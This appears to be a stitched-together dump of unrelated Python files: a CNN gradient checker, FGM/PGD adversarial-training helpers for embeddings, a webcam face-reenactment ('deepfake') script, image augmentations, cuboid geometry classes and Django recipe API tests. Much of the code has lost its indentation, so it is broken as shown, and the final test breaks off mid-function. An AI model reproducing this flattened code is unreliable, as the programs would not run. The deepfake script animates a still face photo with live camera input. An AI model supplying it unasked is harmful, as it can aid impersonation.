weight_z = fc_conv_weights[i]
try:
padding = layer['padding']
            except KeyError:
padding = (0, 0)
stride = layer['stride']
dLoss_dz, dLoss_dW, dLoss_dB = conv_backward(dLoss_dz, weight_z, z, padding, stride)
return_dz[i] = dLoss_dz
elif layer['layer_name'] == 'ReLU':
z = featuremap[i]
dLoss_dz = relu_backward(dLoss_dz, z)
return_dz[i] = dLoss_dz
elif layer['layer_name'] == 'MaxPool2d':
z = featuremap[i]
pooling = layer['kernel_size']
stride = layer['stride']
padding = layer['padding']
dLoss_dz = max_pooling_backward(dLoss_dz, z, pooling, stride, padding)
return_dz[i] = dLoss_dz
elif layer['layer_name'] == 'AvgPool2d':
z = featuremap[i]
pooling = layer['kernel_size']
stride = layer['stride']
padding = layer['padding']
dLoss_dz = average_pooling_backward(dLoss_dz, z, pooling, stride, padding)
return_dz[i] = dLoss_dz
elif layer['layer_name'] == 'Linear':
weight_z = fc_conv_weights[i]
z = featuremap[i]
dLoss_dz, dLoss_dW, dLoss_dB = fc_backward(dLoss_dz, z, weight_z)
return_dz[i] = dLoss_dz
elif layer['layer_name'] == 'View':
last_z = featuremap[i+1]
if 'Pool' in parameters[i+1]['layer_name']:
params = (parameters[i+1]['kernel_size'], parameters[i+1]['stride'], parameters[i+1]['padding'])
else:
params = None
dLoss_dz = view_backward(dLoss_dz, last_z, params)
return_dz[i] = dLoss_dz
elif layer['layer_name'] == 'Add':
dLoss_dz = add_backward(dLoss_dz)
return_dz[i] = dLoss_dz
elif layer['layer_name'] == 'Dropout':
if parameters[i-1]['layer_name'] == 'Dropout':
return_dz[i] = dLoss_dz
                    print('# Skip this layer because the layer has been calculated!')
print('======================== {0:3} Layer: '.format(str(len(parameters)-1-i))+'{0:11}'.\
format(layer['layer_name'])+' Backward End ==========================')
continue
p = layer['p']
mask = featuremap[i]
dLoss_dz = dropback_backward(dLoss_dz, mask, p)
return_dz[i] = dLoss_dz
elif layer['layer_name'] == 'BatchNorm2d':
eps = layer['eps']
z = featuremap[i]
gamma = fc_conv_weights[i]
dLoss_dz = batchnorm2d_backward(dLoss_dz, z, eps, gamma)
return_dz[i] = dLoss_dz
print('======================== {0:3} Layer: '.format(str(len(parameters)-1-i))+'{0:11}'.format(layer['layer_name'])+' Backward End ==========================')
elif isinstance(layer, list):
import copy
tmp_dLoss_dz = []
for j in range(len(layer)):
tmp_dLoss_dz.append(copy.deepcopy(dLoss_dz))
for k in range(len(layer[j])):
tmp_layer = layer[j][k]
print('\n=========================== {0:3} Branch: '.format(str(len(parameters)-1-i))+'{0:11}'.format(tmp_layer['layer_name'])+' Backward Start ====================')
if tmp_layer['layer_name'] == 'Conv2d':
if k+1 >= len(featuremap[i-1][j]):
z = featuremap[i]
else:
z = featuremap[i-1][j][k+1]
weight_z = fc_conv_weights[i][j][k]
try:
padding = tmp_layer['padding']
                    except KeyError:
padding = (0, 0)
stride = tmp_layer['stride']
tmp_dLoss_dz[-1], dLoss_dW, dLoss_dB = conv_backward(tmp_dLoss_dz[-1], weight_z, z, padding, stride)
return_dz[i][j][k] = tmp_dLoss_dz[-1]
elif tmp_layer['layer_name'] == 'ReLU':
z = featuremap[i-1][j][k+1]
tmp_dLoss_dz[-1] = relu_backward(tmp_dLoss_dz[-1], z)
return_dz[i][j][k] = tmp_dLoss_dz[-1]
elif tmp_layer['layer_name'] == 'BatchNorm2d':
eps = tmp_layer['eps']
z = featuremap[i-1][j][k+1]
gamma = fc_conv_weights[i][j][k]
tmp_dLoss_dz[-1] = batchnorm2d_backward(tmp_dLoss_dz[-1], z, eps, gamma)
return_dz[i][j][k] = tmp_dLoss_dz[-1]
print('=========================== {0:3} Branch: '.format(str(len(parameters)-1-i))+'{0:11}'.format(tmp_layer['layer_name'])+' Backward End ======================')
print(tmp_dLoss_dz[0].shape, tmp_dLoss_dz[1].shape)
dLoss_dz = tmp_dLoss_dz[0] + tmp_dLoss_dz[1]
else:
print('Not completed in gradient_backward!')
print('# Torch calculated loss: ', loss_torch.detach().numpy())
loss_torch.backward()
if 'VGG' in str(model) or 'AlexNet' in str(model):
print(judge_tensors_equal(dLoss_dW, model.features[0].weight.grad))
elif 'ResNet' in str(model):
print(judge_tensors_equal(dLoss_dW, model.conv1.weight.grad))
delete_allpths(pth_dir=None)
return return_dz, dLoss_dW, dLoss_dB | 2.265625 | 2 |
ark_nlp/factory/utils/attack.py | yubuyuabc/ark-nlp | 1 | 1191 | <gh_stars>1-10
import torch
class FGM(object):
"""
基于FGM算法的攻击机制
Args:
module (:obj:`torch.nn.Module`): 模型
Examples::
>>> # 初始化
>>> fgm = FGM(module)
>>> for batch_input, batch_label in data:
>>> # 正常训练
>>> loss = module(batch_input, batch_label)
>>> loss.backward() # 反向传播,得到正常的grad
>>> # 对抗训练
>>> fgm.attack() # 在embedding上添加对抗扰动
>>> loss_adv = module(batch_input, batch_label)
>>> loss_adv.backward() # 反向传播,并在正常的grad基础上,累加对抗训练的梯度
>>> fgm.restore() # 恢复embedding参数
>>> # 梯度下降,更新参数
>>> optimizer.step()
>>> optimizer.zero_grad()
Reference:
[1] https://zhuanlan.zhihu.com/p/91269728
"""
def __init__(self, module):
self.module = module
self.backup = {}
def attack(
self,
epsilon=1.,
emb_name='word_embeddings'
):
for name, param in self.module.named_parameters():
if param.requires_grad and emb_name in name:
self.backup[name] = param.data.clone()
norm = torch.norm(param.grad)
if norm != 0 and not torch.isnan(norm):
r_at = epsilon * param.grad / norm
param.data.add_(r_at)
def restore(
self,
emb_name='word_embeddings'
):
for name, param in self.module.named_parameters():
if param.requires_grad and emb_name in name:
assert name in self.backup
param.data = self.backup[name]
self.backup = {}
class PGD(object):
"""
基于PGD算法的攻击机制
Args:
module (:obj:`torch.nn.Module`): 模型
Examples::
>>> pgd = PGD(module)
>>> K = 3
>>> for batch_input, batch_label in data:
>>> # 正常训练
>>> loss = module(batch_input, batch_label)
>>> loss.backward() # 反向传播,得到正常的grad
>>> pgd.backup_grad()
>>> # 对抗训练
>>> for t in range(K):
>>> pgd.attack(is_first_attack=(t==0)) # 在embedding上添加对抗扰动, first attack时备份param.data
>>> if t != K-1:
>>> optimizer.zero_grad()
>>> else:
>>> pgd.restore_grad()
>>> loss_adv = module(batch_input, batch_label)
>>> loss_adv.backward() # 反向传播,并在正常的grad基础上,累加对抗训练的梯度
>>> pgd.restore() # 恢复embedding参数
>>> # 梯度下降,更新参数
>>> optimizer.step()
>>> optimizer.zero_grad()
Reference:
[1] https://zhuanlan.zhihu.com/p/91269728
"""
def __init__(self, module):
self.module = module
self.emb_backup = {}
self.grad_backup = {}
def attack(
self,
epsilon=1.,
alpha=0.3,
emb_name='emb.',
is_first_attack=False
):
        # emb_name should be replaced with the name of the embedding parameter in your model
for name, param in self.module.named_parameters():
if param.requires_grad and emb_name in name:
if is_first_attack:
self.emb_backup[name] = param.data.clone()
norm = torch.norm(param.grad)
if norm != 0 and not torch.isnan(norm):
r_at = alpha * param.grad / norm
param.data.add_(r_at)
param.data = self.project(name, param.data, epsilon)
def restore(self, emb_name='emb.'):
        # emb_name should be replaced with the name of the embedding parameter in your model
for name, param in self.module.named_parameters():
if param.requires_grad and emb_name in name:
assert name in self.emb_backup
param.data = self.emb_backup[name]
self.emb_backup = {}
def project(self, param_name, param_data, epsilon):
r = param_data - self.emb_backup[param_name]
if torch.norm(r) > epsilon:
r = epsilon * r / torch.norm(r)
return self.emb_backup[param_name] + r
def backup_grad(self):
for name, param in self.module.named_parameters():
if param.requires_grad:
self.grad_backup[name] = param.grad.clone()
def restore_grad(self):
for name, param in self.module.named_parameters():
if param.requires_grad:
param.grad = self.grad_backup[name]
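# Illustrative sketch (not part of the original module): a minimal, runnable
# smoke test of the FGM helper defined above, using a toy embedding whose
# parameter name contains the default 'word_embeddings'. The toy model and the
# epsilon value are assumptions chosen purely for demonstration.
if __name__ == "__main__":
    import torch.nn as nn
    emb = nn.Embedding(10, 4)
    toy = nn.Sequential()
    toy.add_module('word_embeddings', emb)  # parameter name becomes 'word_embeddings.weight'
    fgm = FGM(toy)
    ids = torch.tensor([1, 2, 3])
    emb(ids).sum().backward()   # normal backward pass -> normal gradients
    fgm.attack(epsilon=0.5)     # adds r_at = epsilon * grad / ||grad|| to the embedding weights
    emb(ids).sum().backward()   # gradients at the perturbed point accumulate on top
    fgm.restore()               # embedding weights restored from the backup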
| 2.875 | 3 |
core.py | sreejithr/deepfake | 0 | 1192 | import cv2
import torch
import yaml
import imageio
import throttle
import numpy as np
import matplotlib.pyplot as plt
from argparse import ArgumentParser
from skimage.transform import resize
from scipy.spatial import ConvexHull
from modules.generator import OcclusionAwareGenerator
from modules.keypoint_detector import KPDetector
from sync_batchnorm import DataParallelWithCallback
#from animate import normalize_kp
# command = [ffmpeg,
# '-y',
# '-f', 'rawvideo',
# '-vcodec','rawvideo',
# '-pix_fmt', 'bgr24',
# '-s', dimension,
# '-i', '-',
# '-c:v', 'libx264',
# '-pix_fmt', 'yuv420p',
# '-preset', 'ultrafast',
# '-f', 'flv',
# 'rtmp://10.10.10.80/live/mystream']
def normalize_kp(kp_source, kp_driving, kp_driving_initial, adapt_movement_scale=False,
use_relative_movement=False, use_relative_jacobian=False):
if adapt_movement_scale:
source_area = ConvexHull(kp_source['value'][0].data.cpu().numpy()).volume
driving_area = ConvexHull(kp_driving_initial['value'][0].data.cpu().numpy()).volume
adapt_movement_scale = np.sqrt(source_area) / np.sqrt(driving_area)
else:
adapt_movement_scale = 1
kp_new = {k: v for k, v in kp_driving.items()}
if use_relative_movement:
kp_value_diff = (kp_driving['value'] - kp_driving_initial['value'])
kp_value_diff *= adapt_movement_scale
kp_new['value'] = kp_value_diff + kp_source['value']
if use_relative_jacobian:
jacobian_diff = torch.matmul(kp_driving['jacobian'], torch.inverse(kp_driving_initial['jacobian']))
kp_new['jacobian'] = torch.matmul(jacobian_diff, kp_source['jacobian'])
return kp_new
def load_checkpoints(config_path, checkpoint_path, cpu=False):
with open(config_path) as f:
        config = yaml.load(f, Loader=yaml.FullLoader)
generator = OcclusionAwareGenerator(**config['model_params']['generator_params'],
**config['model_params']['common_params'])
if not cpu:
generator.cuda()
kp_detector = KPDetector(**config['model_params']['kp_detector_params'],
**config['model_params']['common_params'])
if not cpu:
kp_detector.cuda()
if cpu:
checkpoint = torch.load(checkpoint_path, map_location=torch.device('cpu'))
else:
checkpoint = torch.load(checkpoint_path)
generator.load_state_dict(checkpoint['generator'])
kp_detector.load_state_dict(checkpoint['kp_detector'])
if not cpu:
generator = DataParallelWithCallback(generator)
kp_detector = DataParallelWithCallback(kp_detector)
generator.eval()
kp_detector.eval()
return generator, kp_detector
@throttle.wrap(1, 2)
def forward(source_image, driving_frame, kp_source, kp_driving_initial, generator, kp_detector, relative=True, adapt_scale=True, cpu=True):
kp_driving = kp_detector(driving_frame)
kp_norm = normalize_kp(
kp_source=kp_source,
kp_driving=kp_driving,
kp_driving_initial=kp_driving_initial,
use_relative_movement=relative,
use_relative_jacobian=relative,
adapt_movement_scale=adapt_scale
)
out = generator(source_image, kp_source=kp_source, kp_driving=kp_norm)
return np.transpose(out["prediction"].data.cpu().numpy(), [0, 2, 3, 1])[0]
if __name__ == "__main__":
parser = ArgumentParser()
parser.add_argument("--config", required=True, help="path to config")
parser.add_argument("--source_image", required=True, help="path to source image")
parser.add_argument("--checkpoint", default="vox-cpk.pth.tar", help="path to checkpoint")
parser.add_argument("--relative", dest="relative", action="store_true", help="use relative or absolute keypoint coordinates")
parser.add_argument("--adapt_scale", dest="adapt_scale", action="store_true", help="adapt movement scale based on convex hull of keypoints")
parser.add_argument("--cpu", dest="cpu", action="store_true", help="CPU mode")
parser.set_defaults(relative=False)
parser.set_defaults(adapt_scale=False)
opt = parser.parse_args()
generator, kp_detector = load_checkpoints(config_path=opt.config, checkpoint_path=opt.checkpoint, cpu=opt.cpu)
source_image = imageio.imread(opt.source_image)
source_image = resize(source_image, (256, 256))[..., :3]
source = torch.tensor(source_image[np.newaxis].astype(np.float32)).permute(0, 3, 1, 2)
if not opt.cpu:
source = source.cuda()
kp_source = kp_detector(source)
#out = cv2.VideoWriter('outpy.avi', cv2.VideoWriter_fourcc('M','J','P','G'), 30, (256, 256))
kp_driving_initial = None
camera = cv2.VideoCapture(0)
ret, frame = camera.read()
while True:
ret, frame = camera.read()
        resized = resize(frame, (256, 256))[..., :3]
        # resize() returns a NumPy array; it is converted to a tensor and moved
        # to the GPU (if requested) once driving_resized is built below
# y = torch.tensor(np.array(resized))
# x = y.cpu().numpy()
# image = cv2.cvtColor(x, cv2.COLOR_BGR2RGB)
# # x = y.permute(1, 2, 0)
# plt.imshow(np.array(image))
# plt.show()
        driving_resized = torch.tensor(np.array(resized)[np.newaxis].astype(np.float32)).permute(0, 3, 1, 2)
        if not opt.cpu:
            driving_resized = driving_resized.cuda()
if not kp_driving_initial:
kp_driving_initial = kp_detector(driving_resized)
fake_frame = forward(
source,
driving_resized,
kp_source,
kp_driving_initial,
generator,
kp_detector,
relative=opt.relative,
adapt_scale=opt.adapt_scale,
cpu=opt.cpu
)
cv2.imshow("frame", fake_frame)
#x = np.squeeze(driving_resized, axis=(0,))
#x = driving_resized[0].permute(1, 2, 0)
# plt_driving = driving_resized #permute(2, 3, 1)
#print(plt_driving.shape)
#plt.imshow(x)
#plt.show()
if cv2.waitKey(1) & 0xFF == ord('q'):
break
camera.release()
cv2.destroyAllWindows()
| 1.726563 | 2 |
soupy/approximations/taylor/backup/__init__.py | cpempire/soupy | 1 | 1193 | <reponame>cpempire/soupy<gh_stars>1-10
from __future__ import absolute_import, division, print_function
from .controlPDEProblem import ControlPDEProblem
from .controlPDEProblemMultiPDE import ControlPDEProblemMultiPDE
from .costFunctionalConstant import CostFunctionalConstant
from .costFunctionalConstantMultiPDE import CostFunctionalConstantMultiPDE
from .costFunctionalLinear import CostFunctionalLinear
from .costFunctionalLinearMultiPDE import CostFunctionalLinearMultiPDE
from .costFunctionalQuadratic import CostFunctionalQuadratic
from .costFunctionalQuadraticMultiPDE import CostFunctionalQuadraticMultiPDE
# from .chanceConstraintQuadratic import ChanceConstraintQuadratic
# from .chanceConstraintLinear import ChanceConstraintLinear
# from .chanceConstraintConstant import ChanceConstraintConstant
# to do list
# 0. implement zero, Hessian term
# 1. implement linear
# 2. implement quadratic
# 3. implement SAA
# to do list
# 1. SAA does not run well in ccgo1, multiprocessor does not work,
### bug not clear; simplifying the adjoint solver works
# 2. quadratic approximation does not converge well, even without variance, does not converge
### record eigenvector after m_tr[i].zero()
# 3. check gradient for quadratic + correction
# what to show tomorrow
# 1. variance reduction by mean square error
# 2. trace estimation by MC and randomized SVD
# 3. scaling with respect to mesh (design + uncertainty), trace, variance reduction, #bfgs
# 4. show the design and state, for both disk and submarine
# 5. random sample and state at different design
# April 9, 2018, work on reporting results
# 1. random samples and states at different design
# 2. table for variance reduction
# 3. plot trace estimation
# 4. plot #bfgs iterations
# obtain all results as planned | 1.578125 | 2 |
models/1-Tom/train/kaggle-hubmap-main/src/02_train/transforms.py | navekshasood/HuBMAP---Hacking-the-Kidney | 0 | 1194 | import numpy as np
from albumentations import (Compose, HorizontalFlip, VerticalFlip, Rotate, RandomRotate90,
ShiftScaleRotate, ElasticTransform,
GridDistortion, RandomSizedCrop, RandomCrop, CenterCrop,
RandomBrightnessContrast, HueSaturationValue, IAASharpen,
RandomGamma, RandomBrightness, RandomBrightnessContrast,
GaussianBlur,CLAHE,
Cutout, CoarseDropout, GaussNoise, ChannelShuffle, ToGray, OpticalDistortion,
Normalize, OneOf, NoOp)
from albumentations.pytorch import ToTensorV2 as ToTensor
from get_config import get_config
config = get_config()
MEAN = np.array([0.485, 0.456, 0.406])
STD = np.array([0.229, 0.224, 0.225])
def get_transforms_train():
transform_train = Compose([
#Basic
RandomRotate90(p=1),
HorizontalFlip(p=0.5),
#Morphology
ShiftScaleRotate(shift_limit=0, scale_limit=(-0.2,0.2), rotate_limit=(-30,30),
interpolation=1, border_mode=0, value=(0,0,0), p=0.5),
GaussNoise(var_limit=(0,50.0), mean=0, p=0.5),
GaussianBlur(blur_limit=(3,7), p=0.5),
#Color
RandomBrightnessContrast(brightness_limit=0.35, contrast_limit=0.5,
brightness_by_max=True,p=0.5),
HueSaturationValue(hue_shift_limit=30, sat_shift_limit=30,
val_shift_limit=0, p=0.5),
CoarseDropout(max_holes=2,
max_height=config['input_resolution'][0]//4, max_width=config['input_resolution'][1]//4,
min_holes=1,
min_height=config['input_resolution'][0]//16, min_width=config['input_resolution'][1]//16,
fill_value=0, mask_fill_value=0, p=0.5),
Normalize(mean=(MEAN[0], MEAN[1], MEAN[2]),
std=(STD[0], STD[1], STD[2])),
ToTensor(),
])
return transform_train
def get_transforms_valid():
transform_valid = Compose([
Normalize(mean=(MEAN[0], MEAN[1], MEAN[2]),
std=(STD[0], STD[1], STD[2])),
ToTensor(),
] )
return transform_valid
def denormalize(z, mean=MEAN.reshape(-1,1,1), std=STD.reshape(-1,1,1)):
return std*z + mean
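# Illustrative usage sketch (not part of the original module): albumentations
# Compose pipelines are called with named arrays and return a dict, so the
# training transform above is typically applied to an image/mask pair as shown
# below. The random arrays are stand-ins for real tiles, and the sketch assumes
# get_config() exposes a (height, width) pair under 'input_resolution', as the
# pipeline above already does.
if __name__ == "__main__":
    _h, _w = config['input_resolution'][:2]
    _img = np.random.randint(0, 256, (_h, _w, 3), dtype=np.uint8)  # stand-in RGB tile
    _msk = np.random.randint(0, 2, (_h, _w), dtype=np.uint8)       # stand-in binary mask
    _aug = get_transforms_train()(image=_img, mask=_msk)
    print(_aug['image'].shape, _aug['mask'].shape)  # CHW image tensor, HW mask tensor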
| 1.851563 | 2 |
cubspack/geometry.py | Majikat/cubspack | 11 | 1195 | <gh_stars>10-100
# -*- coding: utf-8 -*-
from math import sqrt
class Point(object):
__slots__ = ('x', 'y', 'z')
def __init__(self, x, y, z):
self.x = x
self.y = y
self.z = z
def __eq__(self, other):
return (self.x == other.x and self.y == other.y and self.z == other.z)
def __repr__(self):
return "P({}, {}, {})".format(self.x, self.y, self.z)
def distance(self, point):
"""Calculate distance to another point"""
return sqrt((self.x - point.x)**2 + (self.y - point.y)**2 + (
self.z - point.z)**2)
def distance_squared(self, point):
return (self.x - point.x)**2 + (self.y - point.y)**2 + (
self.z - point.z)**2
class Segment(object):
__slots__ = ('start', 'end')
def __init__(self, start, end):
"""Arguments:
start (Point): Segment start point
end (Point): Segment end point
"""
assert(isinstance(start, Point) and isinstance(end, Point))
self.start = start
self.end = end
def __eq__(self, other):
if not isinstance(other, self.__class__):
None
return self.start == other.start and self.end == other.end
def __repr__(self):
return "S({}, {})".format(self.start, self.end)
@property
def length_squared(self):
"""Faster than length and useful for some comparisons"""
return self.start.distance_squared(self.end)
@property
def length(self):
return self.start.distance(self.end)
@property
def top(self):
return max(self.start.y, self.end.y)
@property
def bottom(self):
return min(self.start.y, self.end.y)
@property
def right(self):
return max(self.start.x, self.end.x)
@property
def left(self):
return min(self.start.x, self.end.x)
@property
def ineye(self):
return max(self.start.z, self.end.z)
@property
def outeye(self):
return min(self.start.z, self.end.z)
class HSegment(Segment):
"""Horizontal Segment"""
def __init__(self, start, length):
"""Create an Horizontal segment given its left most end point and its length.
Arguments:
- start (Point): Starting Point
- length (number): segment length
"""
assert(isinstance(start, Point) and not isinstance(length, Point))
super(HSegment, self).__init__(
start, Point(start.x + length, start.y, start.z))
@property
def length(self):
return self.end.x - self.start.x
class VSegment(Segment):
"""Vertical Segment"""
def __init__(self, start, length):
"""Create a Vertical segment given its bottom most end point and its length.
Arguments:
- start (Point): Starting Point
- length (number): segment length
"""
assert(isinstance(start, Point) and not isinstance(length, Point))
super(VSegment, self).__init__(
start, Point(start.x, start.y + length, start.z))
@property
def length(self):
return self.end.y - self.start.y
class DSegment(Segment):
"""In-Depth Segment"""
def __init__(self, start, length):
"""Create an In-Depth segment given its bottom most end point and its length.
Arguments:
- start (Point): Starting Point
- length (number): segment length
"""
assert(isinstance(start, Point) and not isinstance(length, Point))
        super(DSegment, self).__init__(
start, Point(start.x, start.y, start.z + length))
@property
def length(self):
return self.end.z - self.start.z
class Cuboid(object):
"""Basic cuboid primitive class.
x, y, z-> Lower right corner coordinates
width -
height -
depth -
"""
__slots__ = ('width', 'height', 'depth', 'x', 'y', 'z', 'rid')
def __init__(self, x, y, z, width, height, depth, rid=None):
"""Initiating the Cuboid
Args:
x (int, float):
y (int, float):
z (int, float):
width (int, float):
height (int, float):
depth (int, float):
rid (identifier object):
"""
assert(height >= 0 and width >= 0 and depth >= 0)
self.width = width
self.height = height
self.depth = depth
self.x = x
self.y = y
self.z = z
self.rid = rid
@property
def bottom(self):
"""Cuboid bottom edge y coordinate"""
return self.y
@property
def top(self):
"""Cuboid top edge y coordiante"""
return self.y + self.height
@property
def left(self):
"""Cuboid left edge x coordinate"""
return self.x
@property
def right(self):
"""Cuboid right edge x coordinate"""
return self.x + self.width
@property
def outeye(self):
"""Cuboid farther from eye edge z coordinate"""
return self.z
@property
def ineye(self):
"""Cuboid nearer from eye edge z coordinate"""
return self.z + self.depth
@property
def corner_top_l(self):
return Point(self.left, self.top, self.outeye)
@property
def corner_top_r(self):
return Point(self.right, self.top, self.outeye)
@property
def corner_bot_r(self):
return Point(self.right, self.bottom, self.outeye)
@property
def corner_bot_l(self):
return Point(self.left, self.bottom, self.outeye)
@property
def corner_top_l_out(self):
return Point(self.left, self.top, self.ineye)
@property
def corner_top_r_out(self):
return Point(self.right, self.top, self.ineye)
@property
def corner_bot_r_out(self):
return Point(self.right, self.bottom, self.ineye)
@property
def corner_bot_l_out(self):
return Point(self.left, self.bottom, self.ineye)
def __lt__(self, other):
"""Compare cuboids by volume (used for sorting)"""
return self.volume() < other.volume()
def __eq__(self, other):
"""Equal cuboids have same properties."""
if not isinstance(other, self.__class__):
return False
return (self.width == other.width and
self.height == other.height and
self.depth == other.depth and
self.x == other.x and
self.y == other.y and
self.z == other.z)
def __hash__(self):
return hash(
(self.x, self.y, self.z, self.width, self.height, self.depth))
def __iter__(self):
"""Iterate through cuboid corners"""
yield self.corner_top_l
yield self.corner_top_r
yield self.corner_bot_r
yield self.corner_bot_l
yield self.corner_top_l_out
yield self.corner_top_r_out
yield self.corner_bot_r_out
yield self.corner_bot_l_out
def __repr__(self):
return "R({}, {}, {}, {}, {}, {})".format(
self.x, self.y, self.z, self.width, self.height, self.depth)
def volume(self):
"""Cuboid volume"""
return self.width * self.height * self.depth
def move(self, x, y, z):
"""Move Cuboid to x,y,z coordinates
Arguments:
x (int, float): X coordinate
y (int, float): Y coordinate
z (int, float): Z coordinate
"""
self.x = x
self.y = y
self.z = z
def contains(self, cub):
"""Tests if another cuboid is contained by this one
Arguments:
            cub (Cuboid): The other cuboid
Returns:
bool: True if it is inside this one, False otherwise
"""
return (cub.y >= self.y and
cub.x >= self.x and
cub.z >= self.z and
cub.y + cub.height <= self.y + self.height and
cub.x + cub.width <= self.x + self.width and
cub.z + cub.depth <= self.z + self.depth)
def intersects(self, cub, edges=False):
"""Detect intersections between this cuboid and cub.
Args:
cub (Cuboid): Cuboid to test for intersections.
edges (bool): Accept edge touching cuboids as intersects or not
Returns:
bool: True if the cuboids intersect, False otherwise
"""
# Not even touching
if (self.bottom > cub.top or
self.top < cub.bottom or
self.left > cub.right or
self.right < cub.left or
self.outeye > cub.ineye or
self.ineye < cub.outeye):
return False
# Discard edge intersects
if not edges:
if (self.bottom == cub.top or
self.top == cub.bottom or
self.left == cub.right or
self.right == cub.left or
self.outeye == cub.ineye or
self.ineye == cub.outeye):
return False
# Discard corner intersects
if (self.left == cub.right and self.bottom == cub.top and
self.outeye == cub.ineye or
self.left == cub.right and cub.bottom == self.top and
self.outeye == cub.ineye or
self.left == cub.right and self.bottom == cub.top and
cub.outeye == self.ineye or
self.left == cub.right and cub.bottom == self.top and
cub.outeye == self.ineye or
cub.left == self.right and self.bottom == cub.top and
self.outeye == cub.ineye or
cub.left == self.right and cub.bottom == self.top and
self.outeye == cub.ineye or
cub.left == self.right and self.bottom == cub.top and
cub.outeye == self.ineye or
cub.left == self.right and cub.bottom == self.top and
cub.outeye == self.ineye):
return False
return True
def intersection(self, cub, edges=False):
"""Returns the cuboid resulting of the intersection of this and cub
If the cuboids are only touching by their edges, and the
argument 'edges' is True the cuboid returned will have a volume of 0.
Returns None if there is no intersection.
Arguments:
cub (Cuboid): The other cuboid.
edges (bool): If true, touching edges are considered an
intersection, and a cuboid of 0 height or width or depth will be
returned
Returns:
Cuboid: Intersection.
None: There was no intersection.
"""
if not self.intersects(cub, edges=edges):
return None
bottom = max(self.bottom, cub.bottom)
left = max(self.left, cub.left)
top = min(self.top, cub.top)
right = min(self.right, cub.right)
outeye = max(self.outeye, cub.outeye)
ineye = min(self.ineye, cub.ineye)
return Cuboid(
left, bottom, outeye,
right - left, top - bottom, ineye - outeye)
def join(self, other):
"""Try to join a cuboid to this one.
If the result is also a cuboid and the operation is successful then
this cuboid is modified to the union.
Arguments:
other (Cuboid): Cuboid to join
Returns:
bool: True when successfully joined, False otherwise
"""
if self.contains(other):
return True
if other.contains(self):
self.x = other.x
self.y = other.y
self.z = other.z
self.width = other.width
self.height = other.height
self.depth = other.depth
return True
if not self.intersects(other, edges=True):
return False
# Other cuboid is Up/Down from this
if self.left == other.left and self.width == other.width and \
                self.outeye == other.outeye and self.depth == other.depth:
y_min = min(self.bottom, other.bottom)
y_max = max(self.top, other.top)
self.y = y_min
self.height = y_max - y_min
return True
# Other cuboid is Right/Left from this
if self.bottom == other.bottom and self.height == other.height and \
                self.outeye == other.outeye and self.depth == other.depth:
x_min = min(self.left, other.left)
x_max = max(self.right, other.right)
self.x = x_min
self.width = x_max - x_min
return True
        # Other cuboid is In front of/Behind this one (depth direction)
if self.bottom == other.bottom and self.height == other.height and \
self.left == other.left and self.width == other.width:
z_min = min(self.outeye, other.outeye)
z_max = max(self.ineye, other.ineye)
self.z = z_min
self.depth = z_max - z_min
return True
return False
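# Illustrative sketch (not part of the original module): a quick check of the
# Cuboid predicates defined above, using two overlapping 4x4x4 boxes.
if __name__ == "__main__":
    a = Cuboid(0, 0, 0, 4, 4, 4)
    b = Cuboid(2, 2, 2, 4, 4, 4)
    overlap = a.intersection(b)  # cuboid spanning the shared region
    print(a.intersects(b), overlap, overlap.volume())  # True R(2, 2, 2, 2, 2, 2) 8
    print(a.contains(Cuboid(1, 1, 1, 2, 2, 2)))        # True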
| 3.734375 | 4 |
app/recipe/tests/test_recipe_api.py | tahmadvand/recipe_app_api | 0 | 1196 | <reponame>tahmadvand/recipe_app_api
from django.contrib.auth import get_user_model
from django.test import TestCase
from django.urls import reverse
from rest_framework import status
from rest_framework.test import APIClient
# use that for making our API requests
from core.models import Recipe, Tag, Ingredient
from ..serializers import RecipeSerializer, RecipeDetailSerializer
import tempfile
# allows you to call a function which will then create a temp file
# somewhere in the system and then you can remove that file after
# you've used it
import os
# this allows us to perform things like
# creating path names and also checking if files exist on the system
from PIL import Image
# pillow, this will import our image class which will let us then
# create test images which we can then upload to our API
RECIPES_URL = reverse('recipe:recipe-list')
# since we're going to need to access the URL in more
# or less all the tests let's assign that as a variable
# at top of the class in all capitals.
# app : identifier of the URL in the app
# /api/recipe/recipes
# /api/recipe/recipes/1/ (id) --> detail url
def image_upload_url(recipe_id):
"""Return URL for recipe image upload"""
return reverse('recipe:recipe-upload-image', args=[recipe_id])
# generate our upload image url
# you're going to need the existing recipe ID in order to upload an image
def detail_url(recipe_id):
"""Return recipe detail URL"""
return reverse('recipe:recipe-detail', args=[recipe_id])
# name of the end point that the default router will create
# for our viewset because we're going to have a detail action
# this is how you specify arguments with the reverse function
# you just pass in args and then you pass in a list of the
# arguments you want to add
# here we have single item
def sample_tag(user, name='Main course'):
"""Create and return a sample tag"""
return Tag.objects.create(user=user, name=name)
def sample_ingredient(user, name='Cinnamon'):
"""Create and return a sample ingredient"""
return Ingredient.objects.create(user=user, name=name)
def sample_recipe(user, **params):
"""Create and return a sample recipe"""
defaults = {
'title': 'Sample recipe',
'time_minutes': 10,
'price': 5.00,
}
defaults.update(params)
return Recipe.objects.create(user=user, **defaults)
# convert the dictionary into the argument
# when you use the two asterisks when calling a
# function it has the reverse effect.
class PublicRecipeApiTests(TestCase):
"""Test unauthenticated recipe API access"""
def setUp(self):
self.client = APIClient()
def test_required_auth(self):
"""Test the authenticaiton is required"""
res = self.client.get(RECIPES_URL)
self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED)
class PrivateRecipeApiTests(TestCase):
"""Test authenticated recipe API access"""
def setUp(self):
self.client = APIClient()
self.user = get_user_model().objects.create_user(
'<EMAIL>',
'<PASSWORD>'
)
self.client.force_authenticate(self.user)
def test_retrieve_recipes(self):
"""Test retrieving list of recipes"""
sample_recipe(user=self.user)
sample_recipe(user=self.user)
# we're going to access them by retrieving
# all of the recipes from our database.
res = self.client.get(RECIPES_URL)
recipes = Recipe.objects.all().order_by('-id')
serializer = RecipeSerializer(recipes, many=True)
self.assertEqual(res.status_code, status.HTTP_200_OK)
self.assertEqual(res.data, serializer.data)
def test_recipes_limited_to_user(self):
"""Test retrieving recipes for user"""
# test recipes are limited to the authenticated user.
user2 = get_user_model().objects.create_user(
'<EMAIL>',
'pass'
)
sample_recipe(user=user2)
sample_recipe(user=self.user)
res = self.client.get(RECIPES_URL)
# filter our recipes by the authenticated user
recipes = Recipe.objects.filter(user=self.user)
serializer = RecipeSerializer(recipes, many=True)
# many=true: this is because we were returning the list view
# or we wanted to simulate the list view in our serializer
self.assertEqual(res.status_code, status.HTTP_200_OK)
self.assertEqual(len(res.data), 1)
self.assertEqual(res.data, serializer.data)
def test_view_recipe_detail(self):
"""Test viewing a recipe detail"""
recipe = sample_recipe(user=self.user)
